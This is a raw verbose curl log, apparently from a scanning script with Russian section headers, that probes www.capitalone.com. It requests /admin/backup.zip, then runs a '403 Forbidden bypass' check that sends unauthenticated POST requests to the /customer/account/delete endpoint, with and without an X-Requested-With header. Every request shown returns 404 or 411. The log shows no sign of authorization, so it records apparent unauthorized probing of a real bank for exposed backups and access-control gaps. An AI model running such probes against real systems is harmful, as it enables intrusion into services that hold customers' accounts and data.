< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:45:00 GMT
< 
{ [100 bytes data]
100   100  100   100    0     0     81      0  0:00:01  0:00:01 --:--:--    81
* Connection #0 to host www.capitalone.com left intact
<html><head><meta http-equiv="refresh" content="0; url=/page-not-found/"></head><body></body></html>  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [80 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/admin/backup.zip
* [HTTP/2] [1] [:method: GET]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /admin/backup.zip]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> GET /admin/backup.zip HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
  0     0    0     0    0     0      0      0 --:--:--  0:00:01 --:--:--     0< HTTP/2 404 
< accept-ranges: bytes
< content-length: 100
< content-type: text/html
< etag: "d4bf94aec16315618161101efa9d048d:1666125989.803706"
< last-modified: Mon, 26 Sep 2022 16:43:26 GMT
< server: AkamaiNetStorage
< expires: Fri, 20 Jun 2025 15:45:01 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:45:01 GMT
< 
{ [100 bytes data]
100   100  100   100    0     0     84      0  0:00:01  0:00:01 --:--:--    84100   100  100   100    0     0     84      0  0:00:01  0:00:01 --:--:--    84
* Connection #0 to host www.capitalone.com left intact
<html><head><meta http-equiv="refresh" content="0; url=/page-not-found/"></head><body></body></html>


=== Проверка обхода 403 Forbidden ===
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [80 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/customer/account/delete
* [HTTP/2] [1] [:method: POST]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /customer/account/delete]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
} [5 bytes data]
> POST /customer/account/delete HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 411 
< mime-version: 1.0
< content-type: text/html
< content-length: 322
< expires: Fri, 20 Jun 2025 15:45:01 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:45:01 GMT
< x-n: S
< 
{ [322 bytes data]
100   322  100   322    0     0   3857      0 --:--:-- --:--:-- --:--:--  3879
* Connection #0 to host www.capitalone.com left intact
<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference&#32;&#35;7&#46;4e677b5c&#46;1750434301&#46;748b24
<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;7&#46;4e677b5c&#46;1750434301&#46;748b24</P>
</BODY>
</HTML>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Host www.capitalone.com:443 was resolved.
* IPv6: (none)
* IPv4: 92.123.103.82, 92.123.103.58
*   Trying 92.123.103.82:443...
* Connected to www.capitalone.com (92.123.103.82) port 443
* ALPN: curl offers h2,http/1.1
} [5 bytes data]
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
} [512 bytes data]
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Server hello (2):
{ [122 bytes data]
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
{ [29 bytes data]
* TLSv1.3 (IN), TLS handshake, Certificate (11):
{ [2494 bytes data]
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
{ [78 bytes data]
* TLSv1.3 (IN), TLS handshake, Finished (20):
{ [52 bytes data]
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
} [1 bytes data]
* TLSv1.3 (OUT), TLS handshake, Finished (20):
} [52 bytes data]
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / X25519 / id-ecPublicKey
* ALPN: server accepted h2
* Server certificate:
*  subject: jurisdictionC=US; jurisdictionST=Delaware; businessCategory=Private Organization; serialNumber=2419959; C=US; ST=Virginia; L=McLean; postalCode=22102; street=1680 Capital One Dr; O=Capital One Financial Corporation; CN=www.capitalone.com
*  start date: Jan 17 00:00:00 2025 GMT
*  expire date: Jan 16 23:59:59 2026 GMT
*  subjectAltName: host "www.capitalone.com" matched cert's "www.capitalone.com"
*  issuer: C=US; O=DigiCert Inc; CN=DigiCert Global G3 TLS ECC SHA384 2020 CA1
*  SSL certificate verify ok.
*   Certificate level 0: Public key type EC/prime256v1 (256/128 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 1: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
*   Certificate level 2: Public key type EC/secp384r1 (384/192 Bits/secBits), signed using ecdsa-with-SHA384
} [5 bytes data]
* using HTTP/2
* [HTTP/2] [1] OPENED stream for https://www.capitalone.com/customer/account/delete
* [HTTP/2] [1] [:method: POST]
* [HTTP/2] [1] [:scheme: https]
* [HTTP/2] [1] [:authority: www.capitalone.com]
* [HTTP/2] [1] [:path: /customer/account/delete]
* [HTTP/2] [1] [user-agent: curl/8.5.0]
* [HTTP/2] [1] [accept: */*]
* [HTTP/2] [1] [x-requested-with: XMLHttpRequest]
} [5 bytes data]
> POST /customer/account/delete HTTP/2
> Host: www.capitalone.com
> User-Agent: curl/8.5.0
> Accept: */*
> X-Requested-With: XMLHttpRequest
> 
{ [5 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
{ [265 bytes data]
* old SSL session ID is stale, removing
{ [5 bytes data]
< HTTP/2 411 
< mime-version: 1.0
< content-type: text/html
< content-length: 324
< expires: Fri, 20 Jun 2025 15:45:01 GMT
< cache-control: max-age=0, no-cache, no-store
< pragma: no-cache
< date: Fri, 20 Jun 2025 15:45:01 GMT
< x-n: S
< 
{ [324 bytes data]
100   324  100   324    0     0   4541      0 --:--:-- --:--:-- --:--:--  4563
* Connection #0 to host www.capitalone.com left intact
<HTML><HEAD>
<TITLE>Bad Request</TITLE>
</HEAD><BODY>
<H1>Bad Request</H1>
Your browser sent a request that this server could not understand.<P>
Reference&#32;&#35;7&#46;36677b5c&#46;1750434301&#46;bde9111
<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;7&#46;36677b5c&#46;1750434301&#46;bde9111</P>
</BODY>
</HTML>



=== Проверка завершена. Результаты в anomalies_check.txt ===
